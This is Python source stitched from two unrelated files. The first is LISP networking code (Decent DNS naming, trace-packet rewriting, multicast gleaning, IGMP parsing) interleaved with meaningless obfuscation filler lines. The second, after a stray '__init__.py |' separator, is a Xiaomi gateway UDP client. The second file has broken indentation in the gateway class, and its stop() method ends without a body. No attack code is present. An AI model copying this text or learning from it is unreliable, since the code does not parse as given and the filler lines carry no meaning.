if 42 - 42: OoooooooOO - ooOoO0o . OOooOOo + OoOoOO00
def lisp_is_decent_dns_suffix(dns_name):
    """Return True when dns_name (minus its first label) equals the
    configured LISP-Decent DNS suffix; False when none is configured."""
    if (lisp_decent_dns_suffix == None): return (False)
    labels = dns_name.split(".")
    suffix = ".".join(labels[1::])
    return (suffix == lisp_decent_dns_suffix)
if 53 - 53: o0oOOo0O0Ooo
if 55 - 55: ooOoO0o . i1IIi - ooOoO0o + O0 + I1IiiI
if 31 - 31: OoO0O00 % I1Ii111
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
if 81 - 81: i11iIiiIii
if 57 - 57: O0
if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
def lisp_get_decent_index(eid):
    """Hash an EID-prefix into a LISP-Decent index.

    The printed prefix is SHA256-hashed and reduced modulo
    lisp_decent_modulus.
    """
    prefix_str = eid.print_prefix()
    digest = hashlib.sha256(prefix_str).hexdigest()
    return (int(digest, 16) % lisp_decent_modulus)
if 66 - 66: OoOoOO00 . OoooooooOO
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
if 50 - 50: iII111i * O0 % II111iiii
if 80 - 80: OOooOOo - II111iiii - OoO0O00
if 62 - 62: Ii1I . i11iIiiIii % OOooOOo
def lisp_get_decent_dns_name(eid):
    """Return "<decent-index>.<decent-dns-suffix>" for an EID."""
    index = lisp_get_decent_index(eid)
    return (str(index) + "." + lisp_decent_dns_suffix)
if 44 - 44: i1IIi * I1ii11iIi11i % Ii1I . Ii1I * I11i + II111iiii
if 15 - 15: i1IIi - I11i - I1Ii111 / OoO0O00 + Oo0Ooo + I1IiiI
if 81 - 81: IiII
if 54 - 54: I1IiiI % OoO0O00 % OoOoOO00
if 12 - 12: II111iiii . O0 * i11iIiiIii . I11i
if 98 - 98: II111iiii + i1IIi * oO0o % I1IiiI
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
def lisp_get_decent_dns_name_from_str(iid, eid_str):
    """Return "<decent-index>.<decent-dns-suffix>" for an EID given as an
    instance-id plus address string."""
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    index = lisp_get_decent_index(eid)
    return (str(index) + "." + lisp_decent_dns_suffix)
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
if 79 - 79: IiII + I1Ii111
if 59 - 59: iII111i - oO0o . ooOoO0o / IiII * i11iIiiIii
if 61 - 61: I11i - Oo0Ooo * II111iiii + iIii1I11I1II1
if 37 - 37: OoooooooOO % II111iiii / o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i . iIii1I11I1II1
if 73 - 73: OoOoOO00
if 44 - 44: Oo0Ooo / oO0o
if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
if 53 - 53: OOooOOo + i11iIiiIii
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
    rloc_entry=None):
    """Append this node's hop record to a LISP-Trace packet's JSON body.

    Decodes the JSON trace carried after the inner IP/UDP headers, adds a
    path entry (node role, source/dest RLOC, hostname, encap/decap
    timestamp, optional RTT/hop data), turns the packet around at the
    terminating ETR, and rewrites the inner UDP/IP lengths and checksums
    to fit the grown JSON payload.

    Returns True when the caller should keep forwarding the packet, False
    on decode failure or when the trace was returned to the sender
    directly (next-hop RLOC unknown).
    """
    hdr_len = 28 if packet.inner_version == 4 else 48
    trace_payload = packet.packet[hdr_len::]

    trace = lisp_trace()
    if (trace.decode(trace_payload) == False):
        lprint("Could not decode JSON portion of a LISP-Trace packet")
        return (False)

    next_rloc = "?" if packet.outer_dest.is_null() else packet.outer_dest.print_address_no_iid()

    #
    # Record non-default encap port on the destination RLOC string.
    #
    if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
        if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)

    path_entry = {}
    path_entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"

    source_rloc = packet.outer_source
    if (source_rloc.is_null()): source_rloc = lisp_myrlocs[0]
    path_entry["srloc"] = source_rloc.print_address_no_iid()

    #
    # At the originating ITR, tag the client's source port on the SRLOC.
    #
    if (path_entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
        path_entry["srloc"] += ":{}".format(packet.inner_sport)

    path_entry["hn"] = lisp_hostname
    ts_key = ed + "-ts"
    path_entry[ts_key] = lisp_get_timestamp()

    #
    # At the ETR the outer dest is unknown; take the DRLOC from our own
    # database-mapping for the inner destination, when one exists.
    #
    if (next_rloc == "?" and path_entry["node"] == "ETR"):
        db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db != None and len(db.rloc_set) >= 1):
            next_rloc = db.rloc_set[0].rloc.print_address_no_iid()

    path_entry["drloc"] = next_rloc

    if (next_rloc == "?" and reason != None):
        path_entry["drloc"] += " ({})".format(reason)

    if (rloc_entry != None):
        path_entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
        path_entry["hops"] = rloc_entry.recent_rloc_probe_hops

    #
    # Seed the JSON array on the first hop, then append the path entry to
    # the record whose "deid" matches this packet's destination EID.
    #
    seid_str = packet.inner_source.print_address()
    deid_str = packet.inner_dest.print_address()
    if (trace.packet_json == []):
        record = {}
        record["seid"] = seid_str
        record["deid"] = deid_str
        record["paths"] = []
        trace.packet_json.append(record)

    for record in trace.packet_json:
        if (record["deid"] != deid_str): continue
        record["paths"].append(path_entry)
        break

    #
    # Terminating ETR for our own EID: add the reverse-direction record
    # and remember to turn the packet around below.
    #
    turned_around = False
    if (len(trace.packet_json) == 1 and path_entry["node"] == "ETR" and
        trace.myeid(packet.inner_dest)):
        record = {}
        record["seid"] = deid_str
        record["deid"] = seid_str
        record["paths"] = []
        trace.packet_json.append(record)
        turned_around = True

    trace.print_trace()
    trace_payload = trace.encode()

    #
    # No next hop: return the accumulated trace straight to the original
    # sender's RLOC and stop forwarding.
    #
    originator_rloc = trace.packet_json[0]["paths"][0]["srloc"]
    if (next_rloc == "?"):
        lprint("LISP-Trace return to sender RLOC {}".format(originator_rloc))
        trace.return_to_sender(lisp_socket, originator_rloc, trace_payload)
        return (False)

    udp_length = trace.packet_length()

    #
    # Rewrite the UDP length and zero its checksum; for a turned-around
    # IPv6 packet at the ETR, recompute the UDP checksum over the new
    # payload.
    #
    headers = packet.packet[0:hdr_len]
    udp_tail = struct.pack("HH", socket.htons(udp_length), 0)
    headers = headers[0:hdr_len - 4] + udp_tail
    if (packet.inner_version == 6 and path_entry["node"] == "ETR" and
        len(trace.packet_json) == 2):
        udp_header = headers[hdr_len - 8::] + trace_payload
        udp_header = lisp_udp_checksum(seid_str, deid_str, udp_header)
        headers = headers[0:hdr_len - 8] + udp_header[0:8]

    #
    # Turn the packet around: swap IP addresses and UDP ports in the raw
    # header bytes, and the parsed inner source/dest.
    #
    if (turned_around):
        if (packet.inner_version == 4):
            headers = headers[0:12] + headers[16:20] + headers[12:16] + headers[22:24] + headers[20:22] + headers[24::]
        else:
            headers = headers[0:8] + headers[24:40] + headers[8:24] + headers[42:44] + headers[40:42] + headers[44::]

        packet.inner_source, packet.inner_dest = packet.inner_dest, packet.inner_source

    #
    # Fix the IP length field (total-length at offset 2 for IPv4 includes
    # the 20-byte header; payload-length at offset 4 for IPv6 does not).
    #
    len_offset = 2 if packet.inner_version == 4 else 4
    ip_length = 20 + udp_length if packet.inner_version == 4 else udp_length
    len_field = struct.pack("H", socket.htons(ip_length))
    headers = headers[0:len_offset] + len_field + headers[len_offset + 2::]

    #
    # Recompute the IPv4 header checksum over the first 20 bytes.
    #
    if (packet.inner_version == 4):
        zero_cksum = struct.pack("H", 0)
        headers = headers[0:10] + zero_cksum + headers[12::]
        checksummed = lisp_ip_checksum(headers[0:20])
        headers = checksummed + headers[20::]

    packet.packet = headers + trace_payload
    return (True)
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if 85 - 85: OoO0O00 - Ii1I / O0
if 45 - 45: IiII + I1Ii111 / I11i
if 84 - 84: iII111i % II111iiii
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
def lisp_allow_gleaning(eid, group, rloc):
    """
    Check the configured lisp_glean_mappings entries to decide if gleaning
    is allowed for this eid/group/rloc combination.  Returns a 3-tuple
    (glean-allowed, rloc-probe-requested, igmp-query-requested).

    A mapping entry matches only if every key it carries matches; the first
    matching entry wins.
    """
    if (lisp_glean_mappings == []): return(False, False, False)

    for entry in lisp_glean_mappings:
        if ("instance-id" in entry):
            iid = eid.instance_id
            low, high = entry["instance-id"]
            if (iid < low or iid > high): continue

        if ("eid-prefix" in entry):
            # Copy so the configured prefix's instance-id is not clobbered.
            prefix = copy.deepcopy(entry["eid-prefix"])
            prefix.instance_id = eid.instance_id
            if (eid.is_more_specific(prefix) == False): continue

        if ("group-prefix" in entry):
            if (group is None): continue
            prefix = copy.deepcopy(entry["group-prefix"])
            prefix.instance_id = group.instance_id
            if (group.is_more_specific(prefix) == False): continue

        if ("rloc-prefix" in entry):
            if (rloc is not None and rloc.is_more_specific(entry["rloc-prefix"])
                == False): continue

        return(True, entry["rloc-probe"], entry["igmp-query"])

    return(False, False, False)
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    """
    Create or update a gleaned (*, G) map-cache entry for group 'geid',
    adding/refreshing the RLE node for source-EID 'seid' with translated
    RLOC 'rloc':'port'.  When 'igmp' is True, the join is remembered in
    lisp_gleaned_groups so it can be refreshed/aged later.
    """
    group_str = geid.print_address()
    seid_str = seid.print_address_no_iid()
    seid_log = green("{}".format(seid_str), False)
    eid_log = green("(*, {})".format(group_str), False)
    rloc_log = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Look up (S, G); build a brand new gleaned (*, G) entry if not found.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc is None):
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(eid_log))

    #
    # Locate the existing rloc-set entry, its RLE, and the RLE node for
    # this source-EID, if any of them already exist.
    #
    rloc_entry = rle = rle_node = None
    if (mc.rloc_set != []):
        rloc_entry = mc.rloc_set[0]
        if (rloc_entry.rle):
            rle = rloc_entry.rle
            for node in rle.rle_nodes:
                if (node.rloc_name != seid_str): continue
                rle_node = node
                break

    #
    # Create whichever pieces were missing.
    #
    if (rloc_entry is None):
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()

    if (rle is None):
        rle = lisp_rle(geid.print_address())
        rloc_entry.rle = rle

    if (rle_node is None):
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_str
        rle.rle_nodes.append(rle_node)
        rle.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(rloc_log,
            seid_log, eid_log))
    elif (rloc.is_exact_match(rle_node.address) == False or
          port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(rloc_log,
            seid_log, eid_log))

    #
    # Store/refresh the translated RLOC for the RLE node.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # Remember the group join for this source-EID when learned via IGMP.
    #
    if (igmp):
        seid_key = seid.print_address()
        if (seid_key not in lisp_gleaned_groups):
            lisp_gleaned_groups[seid_key] = {}
        lisp_gleaned_groups[seid_key][group_str] = lisp_get_timestamp()
def lisp_remove_gleaned_multicast(seid, geid):
    """
    Remove source-EID 'seid' from the RLE of the gleaned (*, 'geid')
    map-cache entry; delete the whole entry when no RLE nodes remain.
    """
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc is None): return

    rle = mc.rloc_set[0].rle
    if (rle is None): return

    seid_str = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if (rle_node.rloc_name == seid_str):
            found = True
            break
    if (found == False): return

    #
    # Unlink the RLE node and rebuild the replication list.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_key = seid.print_address()
    seid_log = green("{}".format(seid_key), False)
    eid_log = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(eid_log, seid_log))

    #
    # Forget that this source-EID joined the group.
    #
    if (seid_key in lisp_gleaned_groups):
        if (group_str in lisp_gleaned_groups[seid_key]):
            lisp_gleaned_groups[seid_key].pop(group_str)

    #
    # Last listener gone -- remove the gleaned map-cache entry entirely.
    #
    if (rle.rle_nodes == []):
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(eid_log))
def lisp_change_gleaned_multicast(seid, rloc, port):
    """
    The translated RLOC for gleaned source-EID 'seid' changed; refresh the
    RLE entry of every gleaned (*, G) this EID has joined with the new
    'rloc' and 'port'.
    """
    seid_key = seid.print_address()
    if (seid_key not in lisp_gleaned_groups): return

    for group in lisp_gleaned_groups[seid_key]:
        # lisp_geid is a module-level scratch address reused per group.
        lisp_geid.store_address(group)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#
# IGMP message-type names indexed by IGMP type code; used when logging
# unsupported message types.
#
igmp_types = {
    17: "IGMP-query",
    18: "IGMPv1-report",
    19: "DVMRP",
    20: "PIMv1",
    22: "IGMPv2-report",
    23: "IGMPv2-leave",
    30: "mtrace-response",
    31: "mtrace-request",
    34: "IGMPv3-report",
}

#
# IGMPv3 group-record type names, indexed by record-type code.
#
lisp_igmp_record_types = {
    1: "include-mode",
    2: "exclude-mode",
    3: "change-to-include",
    4: "change-to-exclude",
    5: "allow-new-source",
    6: "block-old-sources",
}
def lisp_process_igmp_packet(packet):
    """
    Parse an IGMP packet ('packet' includes the IP header).  Returns True
    for an IGMP query, otherwise a list of [source, group, join-or-leave]
    entries where 'source' is None for (*, G) reports, 'group' is a group
    address string, and join-or-leave is True for joins, False for leaves.
    """
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    from_str = bold("from {}".format(source.print_address_no_iid()), False)

    recv_log = bold("Receive", False)
    lprint("{} {}-byte {}, IGMP packet: {}".format(recv_log, len(packet),
        from_str, lisp_format_packet(packet)))

    #
    # Skip over the IP header; IHL is in 32-bit words.  Use one-byte slices
    # so unpack works with both python2 strings and python3 bytes.
    #
    header_length = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4
    igmp = packet[header_length::]
    igmp_type = struct.unpack("B", igmp[0:1])[0]

    group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
    group_str = group.print_address_no_iid()

    if (igmp_type == 17):
        lprint("IGMP Query for group {}".format(group_str))
        return(True)

    report_or_leave = (igmp_type in (0x12, 0x16, 0x17, 0x22))
    if (report_or_leave == False):
        type_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
            (igmp_type in igmp_types) else igmp_type
        lprint("IGMP type {} not supported".format(type_str))
        return([])

    if (len(igmp) < 8):
        lprint("IGMP message too small")
        return([])

    #
    # IGMPv2 leave.
    #
    if (igmp_type == 0x17):
        lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
        return([[None, group_str, False]])

    #
    # IGMPv1/v2 join.
    #
    if (igmp_type in (0x12, 0x16)):
        lprint("IGMPv{} join (*, {})".format(1 if (igmp_type == 0x12) else 2,
            bold(group_str, False)))
        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
        else:
            return([[None, group_str, True]])
        return([])

    #
    # IGMPv3 report.  The second 32-bit word of the header carries the
    # group-record count.
    #
    record_count = group.address
    igmp = igmp[8::]

    record_format = "BBHI"
    record_size = struct.calcsize(record_format)
    source_format = "I"
    source_size = struct.calcsize(source_format)
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    group_list = []
    for i in range(record_count):
        # BUG FIX: on a truncated packet return the records parsed so far.
        # The old code did a bare "return" (None) and callers iterate the
        # return value.
        if (len(igmp) < record_size): return(group_list)
        record_type, aux_len, source_count, addr = struct.unpack(
            record_format, igmp[:record_size])
        igmp = igmp[record_size::]

        if (record_type not in lisp_igmp_record_types):
            lprint("Invalid record type {}".format(record_type))
            continue

        record_name = lisp_igmp_record_types[record_type]
        source_count = socket.ntohs(source_count)
        group.address = socket.ntohl(addr)
        group_str = group.print_address_no_iid()

        lprint("Record type: {}, group: {}, source-count: {}".format(
            record_name, group_str, source_count))

        #
        # include-mode/allow-new-source records are joins; exclude-mode and
        # change-to-exclude with no sources are (*, G) joins; anything else
        # is treated as a leave.
        #
        joinleave = False
        if (record_type in (1, 5)): joinleave = True
        if (record_type in (2, 4) and source_count == 0): joinleave = True
        action = "join" if (joinleave) else "leave"

        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
            continue

        if (source_count == 0):
            group_list.append([None, group_str, joinleave])
            lprint("IGMPv3 {} (*, {})".format(bold(action, False),
                bold(group_str, False)))

        #
        # Walk the per-record source list, one (S, G) entry per source.
        # NOTE(review): aux_len (auxiliary data length) is never skipped;
        # records carrying aux data would misparse -- confirm senders use 0.
        #
        for j in range(source_count):
            if (len(igmp) < source_size): return(group_list)
            addr = struct.unpack(source_format, igmp[:source_size])[0]
            source.address = socket.ntohl(addr)
            source_str = source.print_address_no_iid()
            group_list.append([source_str, group_str, joinleave])
            lprint("{} ({}, {})".format(action, green(source_str, False),
                bold(group_str, False)))
            igmp = igmp[source_size::]

    return(group_list)
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
if 49 - 49: O0
if 72 - 72: I1Ii111
if 96 - 96: II111iiii / OOooOOo % i1IIi / Oo0Ooo
if 22 - 22: I1IiiI % iIii1I11I1II1 % I1ii11iIi11i
if 68 - 68: iII111i + I11i
if 61 - 61: oO0o . I1Ii111
if 74 - 74: O0 . Ii1I - iII111i % IiII + II111iiii
# Module-level scratch IPv4 group address, reused by the gleaning routines
# below -- presumably to avoid allocating a lisp_address per IGMP record.
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 71 - 71: oO0o + Ii1I % oO0o
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
    """
    Add or refresh a gleaned map-cache entry for source-EID 'seid' learned
    from data-plane RLOC 'rloc':'encap_port'.  When 'igmp' carries an IGMP
    packet, also glean (*, G) state for each group record found in it.
    """
    #
    # Refresh an existing entry, detecting an RLOC/port change; otherwise
    # build a brand new gleaned entry.
    #
    rloc_change = True
    mc = lisp_map_cache.lookup_cache(seid, True)
    if (mc and len(mc.rloc_set) != 0):
        mc.last_refresh_time = lisp_get_timestamp()

        rloc_entry = mc.rloc_set[0]
        cached_rloc = rloc_entry.rloc
        cached_port = rloc_entry.translated_port
        rloc_change = (cached_rloc.is_exact_match(rloc) == False or
            cached_port != encap_port)

        if (rloc_change):
            eid_log = green(seid.print_address(), False)
            rloc_log = red(rloc.print_address_no_iid() + ":" +
                str(encap_port), False)
            lprint("Change gleaned EID {} to RLOC {}".format(eid_log,
                rloc_log))
            rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
            lisp_change_gleaned_multicast(seid, rloc, encap_port)
    else:
        mc = lisp_mapping("", "", [])
        mc.eid.copy_address(seid)
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_GLEAN_TTL
        mc.gleaned = True
        eid_log = green(seid.print_address(), False)
        rloc_log = red(rloc.print_address_no_iid() + ":" + str(encap_port),
            False)
        lprint("Add gleaned EID {} to map-cache with RLOC {}".format(eid_log,
            rloc_log))
        mc.add_cache()

    #
    # Install the (new or changed) translated RLOC as the sole rloc-set
    # entry of the gleaned mapping.
    #
    if (rloc_change):
        rloc_entry = lisp_rloc()
        rloc_entry.store_translated_rloc(rloc, encap_port)
        rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.rloc_set = [rloc_entry]
        mc.build_best_rloc_set()

    #
    # Unicast-only gleaning is done when no IGMP packet rode along.
    #
    if (igmp is None): return

    lisp_geid.instance_id = seid.instance_id

    #
    # Parse the IGMP packet; a bool result means it was a query (nothing
    # to glean from it).
    #
    reports = lisp_process_igmp_packet(igmp)
    if (isinstance(reports, bool)): return

    for source, group, joinleave in reports:
        # Only (*, G) reports are gleaned.
        if (source is not None): continue

        #
        # Glean only groups the configuration allows.
        #
        lisp_geid.store_address(group)
        allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
        if (allow == False): continue

        if (joinleave):
            lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
                True)
        else:
            lisp_remove_gleaned_multicast(seid, lisp_geid)
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
__init__.py | from multiprocessing import Queue
import threading
import logging
import json
import socket
import time
class doorbell:
    """Doorbell sub-function of the gateway.

    Queues doorbell-related miio commands on the owning gateway.
    """
    def __init__(self, parent):
        # parent: owning gateway instance (provides queue_cmd and logger)
        self.parent = parent
        self.logger = parent.logger
        self.sound = 10
        self.volume = 10

    ## TODO: rewrite
    def set_doorbell_sound(self, sound, volume):
        """Set ringtone and/or volume; falsy arguments leave a value unchanged."""
        if sound:
            self.sound = sound
            # leading 1: fixed protocol field -- TODO confirm its meaning
            param = [1, str(self.sound)]
            self.parent.queue_cmd('set_doorbell_sound', param, True)
        if volume:
            self.volume = volume
            self.parent.queue_cmd('set_doorbell_volume', [self.volume])

    def set_doorbell_push(self, push):
        """Enable/disable doorbell push; 'push' must be 'on' or 'off'."""
        # BUG FIX: original tested `push != 'on' or push != 'off'`, which is
        # always true, and queued the command even for invalid values.
        if push not in ('on', 'off'):
            self.logger.error('Invalid doorbell param')
            return
        self.parent.queue_cmd('set_doorbell_push', push, True)

    def get_doorbell_push(self):
        """Query the current doorbell push setting."""
        self.parent.queue_cmd('get_doorbell_push', None, True)
class alarm:
    """Alarm sub-function of the gateway (placeholder; no commands yet)."""
    def __init__(self, parent):
        # parent: owning gateway instance
        self.parent = parent
class clock:
    """Clock sub-function of the gateway (placeholder; no commands yet)."""
    def __init__(self, parent):
        # parent: owning gateway instance
        self.parent = parent
class lightring:
    """Light-ring (RGB LED) sub-function of the gateway.

    The device encodes brightness in the high byte and the 24-bit RGB color
    in the low bytes of a single 'rgb' integer.
    """
    def __init__(self, parent):
        # parent: owning gateway instance (provides queue_cmd)
        self.parent = parent
        self.color = 0xffffff   # last known 24-bit RGB color (int)
        self.brightness = 54    # last known brightness (high byte of 'rgb')

    def set_color(self, color):
        """Set the color, keeping the current brightness."""
        self.set_all(color, self.brightness)

    def set_brightness(self, brightness):
        """Set the brightness, keeping the current color."""
        self.set_all(self.color, brightness)

    def set_all(self, color, brightness):
        """Queue a set_rgb command; 'color' may be a hex string or an int.

        BUG FIX: the original always called int(color, 16), which raises
        TypeError when 'color' is already an int (the set_brightness path).
        """
        rgb = int(color, 16) if isinstance(color, str) else int(color)
        self.parent.queue_cmd('set_rgb', (brightness << 24) + rgb, True)

    def handle_props(self, props):
        """Sync local state from a received 'rgb' property.

        BUG FIX: the original xor'ed the color with the brightness after
        divmod had already split the value, corrupting the stored color.
        """
        for key, value in props.items():
            if key == 'rgb':
                # high byte = brightness, low 24 bits = color
                self.brightness, self.color = divmod(value, 0x1000000)
class gateway:
def __init__(self, ip, port):
# Network config
self.ip = ip
self.port = port
# Queue
self.queue = Queue(maxsize=100)
# Miio config
self.maxlen = 1480
self.id = 0
# Logger
self.logger = logging.getLogger(__name__)
# Heartbeat timestamps
self.lastping = 0
self.lastpong = 0
self.warn_offline = True
# Socket
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
self.socket.settimeout(1)
# Callback
self.callback = None
# Sub-functions
self.light_ring = lightring(self)
self.doorbell = doorbell(self)
self.alarm = alarm(self)
self.clock = clock(self)
# Msg is a device event
def msg_event(self, msg):
event = '.'.join(msg['method'].split('.')[1:])
data = {
'event': event,
'device_id': msg['sid'],
'device_model': msg['model'],
'params': msg['params']
}
self.logger.debug(f'callback for event {event}')
self.callback('event', data)
def msg_props(self, msg):
data = {
'device_id': msg.get('sid'),
'device_model': msg['model'] if 'model' in msg else 'internal',
'props': msg['params']
}
# Props dispatcher, for own properties
if data['device_model'] in ['internal', 'lumi.gateway.mieu01']:
if 'rgb' in data['props']:
self.light_ring.handle_props(data['props'])
# Discard device_log properties
if 'device_log' in data['props']:
return
self.logger.debug(f'callback for {data["device_model"]} properties')
self.callback('properties', data)
def msg_otc(self, msg):
data = {
'device_id': msg.get('sid'),
'device_model': msg['model'] if 'model' in msg else 'internal',
'status': msg['params']
}
self.logger.debug(f'callback for {data["device_model"]} status')
self.callback('status', data)
def recv_msg(self, msg):
method = msg.get('method')
# If there's no method, there's nothing to handle
if not method:
self.logger.warning(f'msg with no method: {msg}')
return
# Remove id (useless)
del msg['id']
# Msg dispatcher
self.logger.debug(f'msg=> {msg}')
## Keepalive events => DGAF
if method == 'event.keepalive':
return
## local events (query_time, query_status, time, status) => DGAF
elif method.startswith('local.'):
return
## sync events (getUserSceneInfo, upLocalSceneRunningLog, check_dev_version, neighborDevInfo) => DGAF
elif method.startswith('_sync.'):
return
## async events (store) => DGAF
elif method.startswith('_async.'):
return
## props (properties???)
## don't know what to do with that
## apparently, if there's no model, it's internal
elif method == 'props':
self.msg_props(msg)
## otc events (log) => parse device status
elif method.startswith('_otc.'):
self.msg_otc(msg)
## pong/heartbeat => just update the timer
elif method == 'internal.PONG' or method == 'event.heartbeat':
self.pong()
## device event => handle that in dedicated function
elif method.startswith('event.'):
self.msg_event(msg)
## that should not happen
else:
self.logger.warn(f'unknown event {method} received')
def msg_decode(self, data):
#self.logger.debug(f'Decode called with {data.decode()}')
if data[-1] == 0:
data = data[:-1]
res = [{''}]
try:
fixed_str = data.decode().replace('}{', '},{')
res = json.loads(f'[{fixed_str}]')
except:
self.logger.warning('Bad JSON received')
return res
def msg_encode(self, data):
if data.get('method', '') == "internal.PING":
msg = data
else:
if self.id != 12345:
self.id = self.id + 1
else:
self.id = self.id + 2
if self.id > 999999999:
self.id = 1
msg = {'id': self.id}
msg.update(data)
return json.dumps(msg).encode()
def callback(self, topic, value):
if self.callback:
self.callback(topic, value)
else:
self.logger.warning('no callback function defined')
def set_callback(self, callback):
self.callback = callback
def send_cmd(self, cmd, params = None, expect_result = False):
self.logger.debug(f'sending cmd {cmd} (params={params})')
data = {}
if params:
encoded = self.msg_encode({'method': cmd, 'params': params})
else:
encoded = self.msg_encode({'method': cmd})
self.socket.sendto(encoded, (self.ip, self.port))
self.socket.settimeout(2)
# Wait for result
try:
msgs = self.msg_decode(self.socket.recvfrom(self.maxlen)[0])
while len(msgs) > 0:
msg = msgs.pop()
if expect_result and 'result' in msg:
self.logger.debug(f'got result for cmd {cmd}')
data = {'cmd': cmd, 'result': msg['result'][0]}
if not cmd == 'internal.PING':
self.callback(f'result', data)
else:
# Other message/event
self.recv_msg(msg)
except socket.timeout:
self.logger.warning(f'no reply for cmd {cmd}')
self.socket.settimeout(1)
return data
def queue_cmd(self, cmd, params = None, expect_result = False):
self.queue.put({'cmd': cmd, 'params': params, 'expect_result': expect_result})
def ping(self):
self.queue_cmd('internal.PING', None, True)
self.lastping = time.time()
def pong(self):
self.logger.debug('hearbeat received')
self.lastpong = time.time()
def run(self):
    """Worker loop: heartbeats, queued sends, and inbound message polling.

    Runs until stop() clears ``thread_running``. Each pass:
    ping if stale, drain the outgoing queue, poll the socket once,
    then check whether the gateway has gone silent.
    """
    while self.thread_running:
        # Manage heartbeat (ping): re-ping when the last one is >200s old.
        if (time.time() - self.lastping) > 200:
            self.ping()
            # Arm a one-shot offline warning for this ping cycle.
            self.warn_offline = True
        # Send queued messages
        while not self.queue.empty():
            req = self.queue.get()
            res = self.send_cmd(req['cmd'], req.get('params'), req.get('expect_result', False))
            if req['cmd'] == 'internal.PING' and res.get('result') == 'online':
                self.pong()
        # Receive messages (socket timeout acts as the loop's pacing)
        try:
            msgs = self.msg_decode(self.socket.recvfrom(self.maxlen)[0])
            while len(msgs) > 0:
                self.recv_msg(msgs.pop())
        except socket.timeout:
            pass
        # Manage heartbeat (pong): no reply for >300s means the gateway is
        # unreachable; warn once per ping cycle.
        if (time.time() - self.lastpong) > 300:
            if self.warn_offline:
                self.logger.debug('gateway is offline!')
                self.warn_offline = False
def start(self):
    """Spawn the daemon worker thread that drives run()."""
    self.thread_running = True
    worker = threading.Thread(target=self.run, daemon=True)
    self.thread = worker
    worker.start()
def stop(self):
    # Ask the worker loop in run() to exit on its next pass; the daemon
    # thread then terminates on its own.
